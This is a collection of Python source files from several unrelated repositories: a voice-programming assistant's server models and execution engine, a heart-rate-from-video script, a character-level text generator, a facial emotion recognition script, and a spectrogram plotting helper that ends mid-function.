self.todos.append(GetInputGoal(self.context, self, attr, f"The value, {value}, isn't a number. Can you try again?"))
else:
self.value = value
return
class SubtractFromVariableActionGoal(ActionGoal):
"""Goal for adding a subtract from variable action"""
def __init__(self, context, variable_name=None, subtract_value=None):
super().__init__(context)
self.setattr("value", subtract_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(SubtractFromVariableAction(self.name, self.value))
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What variable do you want to subtract from?"))
elif value not in self.variables:
self.error = f"The variable, {value}, hasn't been created so there is nothing to subtract it. Try creating the variable first."
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What value do you want to subtract from the variable?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable {value} does not exist. Try setting it to the value of an existing variable."
else:
self.value = value
elif isinstance(value, str):
self.todos.append(GetInputGoal(self.context, self, attr, f"Not a number. Try again."))
else:
self.value = value
return
```
#### File: server/models/action.py
```python
from helpers import to_snake_case
from models.valueof import ValueOf
tab = " "
class Action(object):
"""Represents an action in a procedure"""
def __init__(self):
raise NotImplementedError
def __str__(self):
name = self.__class__.__name__
return to_snake_case(name[:-len("Action")])
def json(self):
return { "name": str(self) }
def python(self):
raise NotImplementedError
def to_nl(self):
raise NotImplementedError
def __eq__(self, other):
raise NotImplementedError
class SetPropertyAction(Action):
def __init__(self, property, value):
self.property = property
self.value = value
def json(self):
return {
"name": str(self),
"property": self.property,
"value": self.value
}
def python(self):
return [f"{self.property} = {self.value}"]
def to_nl(self):
return f"setting property {self.property} to {self.value}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.property == other.property and self.value == other.value
class VariableAction(Action):
def __init__(self, variable, value):
self.variable = variable
self.value = value
def json(self):
return {
"name": str(self),
"variable": self.variable,
"value": self.value
}
def python(self):
return [f"{self.variable} = {self.value}"]
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.value == other.value
class CreateVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"creating a variable called {self.variable} and setting its value to {self.value}"
class SetVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"setting the value of variable {self.variable} to {self.value}"
class AddToVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def python(self):
return [f"{self.variable} += {self.value}"]
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"adding {value} to variable {self.variable}"
class SubtractFromVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def python(self):
return [f"{self.variable} -= {self.value}"]
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"subtracting {value} from variable {self.variable}"
class SayAction(Action):
def __init__(self, phrase):
self.phrase = phrase
def json(self):
return {
"name": str(self),
"phrase": self.phrase
}
def python(self):
return [f"say(\"{self.phrase}\")"]
def to_nl(self):
if isinstance(self.phrase, ValueOf):
return f"saying the value of the variable {self.phrase.variable}"
return f"saying the phrase \"{self.phrase}\""
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.phrase.lower() == other.phrase.lower()
class ConditionalAction(Action):
def __init__(self, condition, actions):
self.condition = condition
self.actions = actions
def json(self):
return {
"name": str(self),
"condition": str(self.condition),
"actions_true": [a.json() for a in self.actions[1]],
"actions_false": [a.json() for a in self.actions[0]]
}
def python(self):
lines = [f"if {str(self.condition)}:"]
lines.extend([f"{tab}{line}" for action in self.actions[1] for line in action.python()])
lines.append("else:")
lines.extend([f"{tab}{line}" for action in self.actions[0] for line in action.python()])
return lines
def to_nl(self):
falses, trues = self.actions
if len(trues) == 1 and \
not isinstance(trues[0], ConditionalAction) and \
(len(falses) == 0 or (len(falses) == 1 and not isinstance(falses[0], ConditionalAction))):
nl = f"{trues[0].to_nl()} if {self.condition.to_nl()}"
if len(falses) == 1:
nl += f" else I am {falses[0].to_nl()}"
return nl
num_falses = len(falses) if len(falses) > 0 else 'no'
num_trues = len(trues) if len(trues) > 0 else 'no'
return f"doing {num_trues} action(s) when {self.condition.to_nl()} and {num_falses} action(s) otherwise"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.condition == other.condition and self.actions[0] == other.actions[0] and self.actions[1] == other.actions[1]
class LoopAction(Action):
def __init__(self, loop, condition, actions):
self.loop = loop
self.condition = condition
self.actions = actions
def json(self):
return {
"name": str(self),
"loop": self.loop,
"condition": str(self.condition),
"actions": [a.json() for a in self.actions]
}
def to_nl(self):
num_actions = str(len(self.actions)) if len(self.actions) > 0 else 'no'
return f"doing {num_actions} action{'s' if num_actions != '1' else ''} in a loop {self.loop} {self.condition.to_nl()}"
def python(self):
if self.loop == "while":
lines = [f"while {str(self.condition)}:"]
lines.extend([f"{tab}{line}" for action in self.actions for line in action.python()])
return lines
raise NotImplementedError
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.loop == other.loop and self.condition == other.condition and self.actions == other.actions
class CreateListAction(Action):
def __init__(self, name):
self.name = name
def json(self):
return {
"name": str(self),
"list": self.name
}
def python(self):
return [f"{self.name} = []"]
def to_nl(self):
return f"creating a list called {self.name}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.name == other.name
class AddToListAction(Action):
def __init__(self, name, value):
self.name = name
self.value = value
def json(self):
return {
"name": str(self),
"list": self.name,
"value": self.value
}
def python(self):
return [f"{self.name}.append({self.value})"]
def to_nl(self):
return f"adding {self.value} to list {self.name}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.name == other.name and self.value == other.value
class AddToListPropertyAction(Action):
def __init__(self, property, value):
self.property = property
self.value = value
def json(self):
return {
"name": str(self),
"property": self.property,
"value": self.value
}
def python(self):
return [f"{self.property}.append({self.value})"]
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.property == other.property and self.value == other.value
class GetUserInputAction(Action):
def __init__(self, variable, prompt):
self.variable = variable
self.prompt = prompt
def json(self):
return {
"name": str(self),
"variable": self.variable,
"prompt": self.prompt
}
def to_nl(self):
return f"listening for input and saving it as {self.variable}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.prompt == other.prompt
class PlaySoundAction(Action):
def __init__(self, sound):
self.sound = sound
def json(self):
return {
"name": str(self),
"sound": self.sound
}
def to_nl(self):
return f"playing the sound file {self.sound}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.sound == other.sound
```
#### File: server/models/condition.py
```python
from error import *
from models import *
class Condition(object):
"""Represents a condition"""
def __init__(self):
pass
def __str__(self):
return "condition"
class SayCondition(Condition):
def __init__(self, phrase):
self.phrase = phrase
def eval(self, phrase):
return self.phrase == phrase
def __str__(self):
return f"'{self.phrase}'"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.phrase == other.phrase
comparison_ops = {
"greater than": ">",
"less than": "<",
"greater than or equal to": ">=",
"less than or equal to": "<="
}
class UntilStopCondition(Condition):
"""Loop-only condition that stops the loop only if user says stop"""
def eval(self):
return True
def __str__(self):
return "you say 'stop'"
def to_nl(self):
return self.__str__()
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return True
class EqualityCondition(Condition):
"""Represents an equality condition"""
def __init__(self, variable, value, negation=False):
# Variable to retrieve when evaluating
self.variable = variable
# Value to compare against
self.value = value
# Whether it is == or !=
self.negation = negation
def eval(self, variables):
"""
Evaluate the variable
Assumes that the variable to evaluate is in variables
"""
variable = variables[self.variable.variable]
value = variables[self.value.variable] if isinstance(self.value, ValueOf) else self.value
if type(value) != type(variable):
if isinstance(value, str) or isinstance(variable, str):
raise ExecutionError(f"The values {value} and {variable} cannot be compared.")
return variable != value if self.negation else variable == value
def __str__(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"{self.variable.variable} {'!' if self.negation else '='}= {value}"
def to_nl(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"variable {self.variable.variable} is {'not ' if self.negation else ''}equal to {value}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.value == other.value and self.negation == other.negation
class ComparisonCondition(Condition):
"""Represents an comparison condition"""
def __init__(self, variable, op, value):
# Variable to retrieve when evaluating
self.variable = variable
# Value to compare against
self.value = value
# Operator to evaluate with - includes >, >=, <, <=
self.op = op
def eval(self, variables):
"""
Evaluate the variable
Assumes that the variable to evaluate is in variables
"""
variable = variables[self.variable.variable]
value = variables[self.value.variable] if isinstance(self.value, ValueOf) else self.value
if type(value) != type(variable):
if isinstance(value, str) or isinstance(variable, str):
raise ExecutionError(f"The values {value} and {variable} cannot be compared.")
if self.op == "greater than":
return variable > value
elif self.op == "less than":
return variable < value
elif self.op == "greater than or equal to":
return variable >= value
elif self.op == "less than or equal to":
return variable <= value
return False
def __str__(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"{self.variable.variable} {comparison_ops.get(self.op)} {value}"
def to_nl(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"variable {self.variable.variable} is {self.op} {value}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.value == other.value and self.op == other.op
```
#### File: server/models/execution.py
```python
import copy
import threading
import time
from app import sio, logger
from error import *
from models import *
from helpers import *
class Execution(object):
"""
Represents an execution of a procedure
Executes the procedure in a child thread such that the server does not have to
wait for execution to finish before performing other actions - this way multiple users
can send messages at once and allow for users to stop execution of a procedure before it
finishes - allowing for stopping of infinite loops.
"""
def __init__(self, context, actions, to_emit=True):
self.context = context
self.actions = actions
self.variables = {}
self.step = 0
self.input_needed = None
self.thread_running = False
self.finished = False
self.to_emit = to_emit
self.first_message_emitted = False
def run(self, message=None):
"""
Starts execution
Execution starts essentially from two different states:
1. From the beginning of a procedure
2. After asking for user input, execution starts again with user's next message as input
"""
if self.input_needed and message:
# If input was needed, try to parse message and if it's a number try to parse number
number = parse_number(message)
self.variables[self.input_needed] = number if number is not None else message
logger.debug(f"[{self.context.sid}][Execution] Variables after getting input: {str(self.variables)}")
self.input_needed = None
self.thread = threading.Thread(target=self.advance)
# Means if the main thread stops (the server), this thread will also stop
self.thread.daemon = True
self.thread_running = True
if not self.first_message_emitted:
self.emit("response", { "message": "Procedure started running.", "state": self.context.state, "speak": False })
logger.debug(f"[{self.context.sid}][Execution] Procedure started running.")
self.first_message_emitted = True
logger.debug(f"[{self.context.sid}][Execution] Thread started running.")
self.thread.start()
def stop(self):
"""Stop execution"""
self.thread_running = False
def finish(self, message=None):
"""Finish up execution"""
self.stop()
self.finished = True
# Transition from "running" state to "home" state
self.context.transition("finish")
self.context.execution = None
if message is not None:
logger.debug(f"[{self.context.sid}][Execution] Execution stopped with message: {message}")
self.emit("response", { "message": message, "state": self.context.state })
def advance(self):
"""Continue execution"""
while self.thread_running and not self.finished and self.step < len(self.actions):
action = self.actions[self.step]
try:
# Tries to evaluate action
self.evaluate_action(action)
self.step += 1
sio.sleep(0.1)
if self.input_needed:
# If input is needed (i.e. reaches a GetUserInputAction), stop execution and ask user for input
self.stop()
return
except KeyError as e:
# Error when variable referenced does not exist
logger.debug(f"[{self.context.sid}][Execution] KeyError: {e.args[0]}")
self.finish(f"Error occured while running. Variable {e.args[0]} did not exist when I was {action.to_nl()}.")
return
except ExecutionError as e:
# Error that happens during execution like infinite loops, etc.
logger.debug(f"[{self.context.sid}][Execution] ExecutionError: {e.message}")
self.finish(e.message)
return
if self.step >= len(self.actions):
break
if not self.finished:
self.finish("Procedure finished running.")
def emit(self, event, data):
"""Emit or send message to user via sockets"""
if not self.to_emit:
return
try:
message = f" with the message: {data['message']}" if "message" in data else "."
logger.debug(f"[{self.context.sid}][Execution] Emitting '{event}'{message}")
sio.emit(event, data, room=str(self.context.sid))
except RuntimeError as e:
logger.debug(f"[{self.context.sid}][Execution] RuntimeError: {str(e)}")
if not str(e).startswith("Working outside of request context."):
raise e
def evaluate_action(self, action):
"""Evaluates an action"""
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Evaluating action {str(action)} on step {self.step}.")
if isinstance(action, SayAction):
phrase = action.phrase
if isinstance(action.phrase, ValueOf):
variable = action.phrase.variable
phrase = f"The value of {variable} is \"{self.variables[variable]}\"."
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Saying '{phrase}'")
self.emit("response", { "message": phrase, "state": self.context.state })
self.context.add_message(action.phrase)
elif isinstance(action, PlaySoundAction):
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Playing sound file {action.sound}.")
self.emit("playSound", { "sound": action.sound, "state": self.context.state })
elif isinstance(action, GetUserInputAction):
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Getting user input and setting as {action.variable}.")
self.input_needed = action.variable
if action.prompt:
self.emit("response", { "message": action.prompt, "state": self.context.state })
elif isinstance(action, CreateVariableAction):
self.variables[action.variable] = self.variables[action.value.variable] if isinstance(action.value, ValueOf) else action.value
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Creating variable {action.variable} with value {self.variables[action.variable]}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after creating variable: {str(self.variables)}")
elif isinstance(action, SetVariableAction):
if action.variable in self.variables:
self.variables[action.variable] = self.variables[action.value.variable] if isinstance(action.value, ValueOf) else action.value
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Setting variable {action.variable} with value {self.variables[action.variable]}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after setting variable: {str(self.variables)}")
else:
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variable {action.variable} not found.")
raise KeyError(action.variable)
elif isinstance(action, AddToVariableAction) or isinstance(action, SubtractFromVariableAction):
value = self.variables.get(action.variable)
if action.variable in self.variables:
old = self.variables[action.variable]
factor = 1 if isinstance(action, AddToVariableAction) else -1
if isinstance(action.value, float) or isinstance(action.value, int):
self.variables[action.variable] += factor * action.value
elif isinstance(action.value, ValueOf):
self.variables[action.variable] += factor * self.variables[action.value.variable]
new = self.variables[action.variable]
if isinstance(action, AddToVariableAction):
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Incrementing variable {action.variable} from {old} to {new}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after incrementing variable: {str(self.variables)}")
else:
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Decrementing variable {action.variable} from {old} to {new}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after decrementing variable: {str(self.variables)}")
else:
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variable {action.variable} not found.")
raise KeyError(action.variable)
elif isinstance(action, ConditionalAction):
res = action.condition.eval(self.variables)
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Evaluating condition for if statement.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables when evaluating condition: {str(self.variables)}")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Condition for if statement ({str(action.condition)}) is " + ("true" if res else "false"))
self.actions[self.step:self.step + 1] = action.actions[res]
self.step -= 1
elif isinstance(action, LoopAction):
if (action.loop == "until" and isinstance(action.condition, UntilStopCondition)):
res = False
else:
res = action.condition.eval(self.variables)
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Evaluating condition for {action.loop} loop.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables when evaluating condition: {str(self.variables)}")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Condition for {action.loop} loop ({str(action.condition)}) is " + ("true" if res else "false"))
if (action.loop == "until" and not res) or (action.loop == "while" and res):
self.actions[self.step:self.step] = action.actions
self.step -= 1
else:
raise NotImplementedError
class InternalExecution(Execution):
"""Execution that is ran internally without user knowing - used in user study to check advanced scenarios"""
def __init__(self, context, actions, inputs):
super().__init__(context, actions)
self.inputs = inputs
self.iterinputs = iter(inputs)
self.emits = []
self.original_length = len(actions)
def advance(self):
while self.step < len(self.actions):
action = self.actions[self.step]
try:
self.evaluate_action(action)
self.step += 1
if self.input_needed:
message = next(self.iterinputs)
number = parse_number(message)
self.variables[self.input_needed] = number if number is not None else message
logger.debug(f"[{self.context.sid}][Execution] Variables after getting input: {str(self.variables)}")
self.input_needed = None
except KeyError as e:
logger.debug(f"[{self.context.sid}][Execution] KeyError: {e.args[0]}")
return "KeyError"
except ExecutionError as e:
logger.debug(f"[{self.context.sid}][Execution] ExecutionError: {e.message}")
return "ExecutionError"
except StopIteration as e:
logger.debug(f"[{self.context.sid}][Execution] StopIteration: Too many inputs needed.")
return "StopIteration"
if len(self.actions) > self.original_length * 100:
logger.debug(f"[{self.context.sid}][Execution] Infinite loop detected.")
return "InfiniteLoop"
self.finish()
return None
def run(self):
logger.debug(f"[{self.context.sid}][Execution] Starting to check procedure.")
logger.debug(f"[{self.context.sid}][Execution] Actions: {[str(a) for a in self.actions]}")
logger.debug(f"[{self.context.sid}][Execution] Inputs: {self.inputs}.")
return self.advance()
def finish(self):
logger.debug(f"[{self.context.sid}][Execution] Finishing checking procedure.")
logger.debug(f"[{self.context.sid}][Execution] Emits: {self.emits}.")
self.finished = True
def emit(self, event, data):
"""Add to list of emits instead of actually sending responses to user"""
self.emits.append((event, data))
```
|
{
"source": "jessvb/Heart-rate-from-video",
"score": 3
}
|
#### File: jessvb/Heart-rate-from-video/heart-rate-post-process.py
```python
import cv2
import numpy as np
import sys
import time
from classes.process import Process
from classes.video import Video
import pandas as pd
import os
################################################################################
######### Change these depending on where your recordings are located ##########
rec_dir = 'recordings/'
################################################################################
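# Illustrative layout assumed by the code below (example file name is made up):
# .avi/.mp4 recordings are read from rec_dir, e.g. recordings/session1.mp4, and
# each one produces output/heartrate_session1.csv, so an 'output' directory
# must already exist next to this script.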
def getVideoHeartRate(video,process,output_name):
frame = np.zeros((10,10,3),np.uint8)
bpm = 0
# for exporting to csv
bpm_all = []
timestamps = []
# Run the loop
process.reset()
video.start()
max_frame_num = int(video.cap.get(cv2.CAP_PROP_FRAME_COUNT))
curr_frame_num = 0 # so the progress report is defined even if the first read fails
iter_percent = 0 # for printing percent done
hasNextFrame = True
while hasNextFrame == True:
frame = video.get_frame()
if frame is not None:
process.frame_in = frame
process.run()
f_fr = process.frame_ROI #get the face
bpm = process.bpm #get the bpm change over the time
f_fr = cv2.cvtColor(f_fr, cv2.COLOR_RGB2BGR)
f_fr = np.transpose(f_fr,(0,1,2)).copy()
bpm_all.append(bpm)
curr_frame_num = video.cap.get(cv2.CAP_PROP_POS_FRAMES)
timestamps.append(curr_frame_num/video.fps)
else:
hasNextFrame = False
# every so often, show percent done
percent_done = curr_frame_num/max_frame_num*100
if (percent_done > iter_percent):
print('current frame: %.0f' % curr_frame_num)
print('percent done: %.1f%%' % percent_done)
iter_percent += 20
# Export predicted bpm to .csv format
df = pd.DataFrame({'BPM': bpm_all, 'TIMESTAMP_SEC': timestamps})
df.to_csv(os.path.join('output', 'heartrate_' + output_name + '.csv'), sep=',', index=False)
print('🎉 Done! 🎉')
print('See the output file:')
print('output/' + 'heartrate_' + output_name + '.csv')
if __name__ == '__main__':
# Loop through specific files and analyze their video
files_in_dir = [f for f in os.listdir(rec_dir) if os.path.isfile(os.path.join(rec_dir, f))]
i = 0
for f in files_in_dir:
video = Video()
process = Process()
if os.path.splitext(f)[1].lower() in ('.avi', '.mp4'):
video.dirname = os.path.join(rec_dir,f)
output_name = os.path.splitext(f)[0]
print(f'Reading from {video.dirname}')
getVideoHeartRate(video, process, output_name)
i += 1
print(f"""Number of files to go: {len(files_in_dir) - i}
Percent files done: {i/len(files_in_dir)*100}\n""")
```
|
{
"source": "jessvb/lstm_model_loader",
"score": 3
}
|
#### File: jessvb/lstm_model_loader/max-likelihood.py
```python
import sys
import json
models = {
'aliceInWonderland':'max-likelihood-models/AiW_model.json',
'drSeuss': 'max-likelihood-models/drSeuss_.json',
'hamlet': 'max-likelihood-models/hamlet_model.json',
'harryPotter': 'max-likelihood-models/harryPotter_model.json',
'hungerGames': 'max-likelihood-models/hungerGames_model.json',
'nancy': 'max-likelihood-models/nancy_model.json',
'narnia': 'max-likelihood-models/narnia_model.json',
'shakespeare': 'max-likelihood-models/shakespeare_model.json',
'tomSawyer': 'max-likelihood-models/tomSawyer_model.json',
'wizardOfOz': 'max-likelihood-models/WoOz_model.json',
}
from random import random
def generate_letter(lm, history, order):
"""Samples the model's probability distribution and returns the letter"""
history = history[-order:]
dist = lm[history]
x = random()
for c,v in dist:
x = x - v
if x <= 0: return c
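# Worked example of the sampling above (numbers are made up): with
# dist = [('a', 0.5), ('b', 0.3), ('c', 0.2)] and x = 0.6, subtracting 0.5
# leaves 0.1 and subtracting 0.3 drops x below zero, so 'b' is returned;
# letters are therefore drawn in proportion to their stored probabilities.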
def generate_text(lm, order, nletters=1000):
"""The original generate text function. The seed text is just the prefix used in training"""
history = "~" * order
out = []
for i in range(nletters):
c = generate_letter(lm, history, order)
history = history[-order:] + c
out.append(c)
return "".join(out)
def gen_text(lm, seed, nletters=1000):
"""Same as generate_text, except it now handles keys it hasn't seen before"""
for k in lm.keys():
order = len(k)
if len(seed) < order:
seed = ' ' * order + seed
history = seed[-order:]
out = []
for i in range(nletters):
if history not in lm:
if history.lower() in lm:
history = history.lower()
else:
def find_suitable_replacement():
for removed_letters in range (1, order):
for k, v in lm.items():
if k[-order+removed_letters:] == history[-order+removed_letters:]:
return k
history = find_suitable_replacement()
c = generate_letter(lm, history, order)
history = history[-order+1:] + c
out.append(c)
return "".join(out)
# loads the saved model
with open(models[sys.argv[1]]) as f:
model = json.loads(f.read())
# uses the loaded model to generate the results
results = gen_text(model, sys.argv[2], nletters=int(sys.argv[3]))
print(results)
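# Hypothetical invocation (arguments inferred from the sys.argv usage above):
#   python max-likelihood.py hamlet "To be" 500
# loads max-likelihood-models/hamlet_model.json, seeds generation with "To be"
# and prints 500 generated letters.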
```
|
{
"source": "jessvb/Multimodal-Emotion-Recognition",
"score": 2
}
|
#### File: jessvb/Multimodal-Emotion-Recognition/video_er_from_file.py
```python
from __future__ import division
import numpy as np
import pandas as pd
import time
from time import sleep
import re
import os
import requests
import argparse
from collections import OrderedDict
### Image processing ###
import cv2
from scipy.ndimage import zoom
from scipy.spatial import distance
import imutils
from scipy import ndimage
import dlib
from imutils import face_utils
### Model ###
from tensorflow.keras.models import load_model
from tensorflow.keras import backend as K
################################################################################
########## Change this depending on where your recordings are located ##########
################################################################################
rec_dir = 'recordings/'
################################################################################
def getVideoEmotions(input_video_filepath,output_name):
# Start video capture. 0 = Webcam, 1 = Video file, -1 = Webcam for Web
video_capture = cv2.VideoCapture(input_video_filepath)
# Image shape
shape_x = 48
shape_y = 48
input_shape = (shape_x, shape_y, 1)
# We have 7 emotions
nClasses = 7
# Timer until the end of the recording
curr_frame_num = 0
# Initiate Landmarks
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
(nStart, nEnd) = face_utils.FACIAL_LANDMARKS_IDXS["nose"]
(mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS["mouth"]
(jStart, jEnd) = face_utils.FACIAL_LANDMARKS_IDXS["jaw"]
(eblStart, eblEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eyebrow"]
(ebrStart, ebrEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eyebrow"]
# Load the pre-trained X-Ception model
model = load_model('Models/video.h5')
# Load the face detector
face_detect = dlib.get_frontal_face_detector()
# Load the facial landmarks predictor
predictor_landmarks = dlib.shape_predictor("Models/face_landmarks.dat")
# Prediction vector
predictions = []
# Timer for length of video
max_frame_num = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
fps = video_capture.get(cv2.CAP_PROP_FPS)
frames_btwn = int(fps/3) # measure emotion every 1/3 of a sec
# angry_0 = []
# disgust_1 = []
# fear_2 = []
# happy_3 = []
# sad_4 = []
# surprise_5 = []
# neutral_6 = []
# Initialize arrays for saving predictions
emotions = []
face_indices = []
timestamps = []
# Analyze video until the end
curr_frame_num = 0
iter_percent = 0 # for printing
while curr_frame_num < max_frame_num:
# Set the frame to be read
video_capture.set(cv2.CAP_PROP_POS_FRAMES, curr_frame_num)
# Capture the frame number set above (frame here means image)
ret, frame = video_capture.read()
# Face index, face by face
face_index = 0
# Image to gray scale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# All faces detected
rects = face_detect(gray, 1)
# For each detected face
for (i, rect) in enumerate(rects):
# Identify face coordinates
(x, y, w, h) = face_utils.rect_to_bb(rect)
face = gray[y:y+h,x:x+w]
# Zoom on extracted face (if face extracted)
if face.shape[0] and face.shape[1]:
face = zoom(face, (shape_x / face.shape[0],shape_y / face.shape[1]))
# Cast type float
face = face.astype(np.float32)
# Scale the face
face /= float(face.max())
face = np.reshape(face.flatten(), (1, 48, 48, 1))
# Make Emotion prediction on the face, outputs probabilities
prediction = model.predict(face)
# Most likely emotion (as an index)
prediction_result = np.argmax(prediction)
# Convert emotion index to an emotion (string)
emotion = ''
if (prediction_result == 0):
emotion = 'Angry'
elif (prediction_result == 1):
emotion = 'Disgust'
elif (prediction_result == 2):
emotion = 'Fear'
elif (prediction_result == 3):
emotion = 'Happy'
elif (prediction_result == 4):
emotion = 'Sad'
elif (prediction_result == 5):
emotion = 'Surprise'
elif (prediction_result == 6):
emotion = 'Neutral'
else:
emotion = 'Unknown emotion'
else:
emotion = 'No face extracted'
# save results for later
emotions.append(emotion)
face_indices.append(face_index)
timestamps.append(curr_frame_num/fps)
# every so often, show percent done
percent_done = curr_frame_num/max_frame_num*100
if (percent_done > iter_percent):
print('current frame: %.0f' % curr_frame_num)
print('percent done: %.1f%%' % percent_done)
iter_percent += 20
# increment frame
curr_frame_num += frames_btwn
video_capture.release()
# Export predicted emotions to .csv format
df = pd.DataFrame({'EMOTION': emotions, 'FACE_INDEX': face_indices, 'TIMESTAMP_SEC': timestamps})
df.to_csv(os.path.join('output', 'video_emotions_' + output_name + '.csv'), sep=',', index=False)
print('🎉 Done! 🎉')
print('See the output file:')
print('output/' + 'video_emotions_' + output_name + '.csv')
if __name__ == '__main__':
# Loop through specific files and analyze their video
files_in_dir = [f for f in os.listdir(rec_dir) if os.path.isfile(os.path.join(rec_dir, f))]
i = 0
for f in files_in_dir:
if os.path.splitext(f)[1].lower() in ('.avi', '.mp4'):
input_video_filepath = os.path.join(rec_dir,f)
print(f'Reading from {input_video_filepath}')
output_name = os.path.splitext(f)[0]
getVideoEmotions(input_video_filepath, output_name)
i += 1
print(f"""Number of files to go: {len(files_in_dir) - i}
Percent files done: {i/len(files_in_dir)*100}\n""")
```
|
{
"source": "jessvb/speech-utils",
"score": 3
}
|
#### File: jessvb/speech-utils/create_spectrogram.py
```python
import parselmouth
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
boyfile = "data_highpitched/train/boy/am/8z1a.wav"
girlfile = "data_highpitched/train/girl/is/8z1a.wav"
manfile = "data_wav/train/man/ff/8z1a.wav"
womanfile = "data_wav/train/woman/cg/8z1a.wav"
highmanfile = "data_highpitched/train/man/ff/8z1a.wav"
highwomanfile = "data_highpitched/train/woman/cg/8z1a.wav"
sns.set() # Use seaborn's default style to make attractive graphs
# Plot nice figures using Python's "standard" matplotlib library
sndboy = parselmouth.Sound(boyfile)
sndgirl = parselmouth.Sound(girlfile)
sndman = parselmouth.Sound(manfile)
sndwoman = parselmouth.Sound(womanfile)
sndhighman = parselmouth.Sound(highmanfile)
sndhighwoman = parselmouth.Sound(highwomanfile)
#plt.figure()
#plt.plot(snd.xs(), snd.values.T)
#plt.xlim([snd.xmin, snd.xmax])
#plt.xlabel("time [s]")
#plt.ylabel("amplitude")
#plt.show() # or plt.savefig("sound.png"), or plt.savefig("sound.pdf")
def draw_spectrogram(spectrogram, dynamic_range=70):
X, Y = spectrogram.x_grid(), spectrogram.y_grid()
sg_db = 10 * np.log10(spectrogram.values)
plt.pcolormesh(X, Y, sg_db, vmin=sg_db.max() - dynamic_range, cmap='afmhot')
plt.ylim([spectrogram.ymin, spectrogram.ymax])
plt.xlabel("time [s]")
plt.ylabel("frequency [Hz]")
def draw_intensity(intensity):
plt.plot(intensity.xs(), intensity.values.T, linewidth=3, color='w')
plt.plot(intensity.xs(), intensity.values.T, linewidth=1)
plt.grid(False)
plt.ylim(0)
plt.ylabel("intensity [dB]")
#intensity = snd.to_intensity()
#spectrogram = snd.to_spectrogram()
#plt.figure()
#draw_spectrogram(spectrogram)
#plt.twinx()
#draw_intensity(intensity)
#plt.xlim([snd.xmin, snd.xmax])
#plt.show() # or plt.savefig("spectrogram.pdf")
def draw_pitch(pitch):
# Extract selected pitch contour, and
# replace unvoiced samples by NaN to not plot
pitch_values = pitch.selected_array['frequency']
pitch_values[pitch_values==0] = np.nan
plt.plot(pitch.xs(), pitch_values, 'o', markersize=5, color='w')
plt.plot(pitch.xs(), pitch_values, 'o', markersize=2)
plt.grid(False)
plt.ylim(0, pitch.ceiling)
plt.ylabel("fundamental frequency [Hz]")
def create_spec_with_pitch(infile):
snd = parselmouth.Sound(infile)
pitch = snd.to_pitch()
# If desired, pre-emphasize the sound fragment before calculating the spectrogram
pre_emphasized_snd = snd.copy()
pre_emphasized_snd.pre_emphasize()
